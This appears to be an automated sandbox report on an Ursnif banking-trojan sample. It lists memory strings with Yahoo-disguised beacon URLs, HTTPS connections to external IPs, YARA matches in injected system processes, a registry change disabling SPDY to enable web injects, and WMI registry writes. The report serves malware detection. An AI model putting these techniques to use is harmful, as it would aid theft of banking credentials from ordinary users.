Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: *.www.yahoo.comT equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: +www.yahoo.co equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: +www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp	String found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'"></noscript> equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/ GlobalSign Root CA-R2 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com// equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/R equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/[ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: https://www.yahoo.com/u equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp	String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwv/CCpK equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwx equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'; equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com7 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comB equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comE equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comows\system32\jsproxy.dll equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.comzD( equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp	String found in binary or memory: www.yahoo.com{ equals www.yahoo.com (Yahoo)

Source: unknown	HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Source: FpYf5EGDO9.exe, 00000000.00000002.510175221.00000000021AA000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4AFC0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C47FBE
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Code function: 0_2_03C4836E
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A559E4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A57548
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3C3E4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A39098
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A35420
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4C400
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A44818
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A50468
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3847C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A41C44
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A58448
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A365A8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A329B0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A591B0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4CDC4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A40DC8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4B1D0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4993C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A53D68
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A48974
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A59AA8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A45AB4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3AAB4
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A42A90
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4DEE8
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A452D0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A31638
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A4220C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A35A1C
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A477A0
Source: C:\Windows\System32\control.exe	Code function: 21_2_00A3CFF8
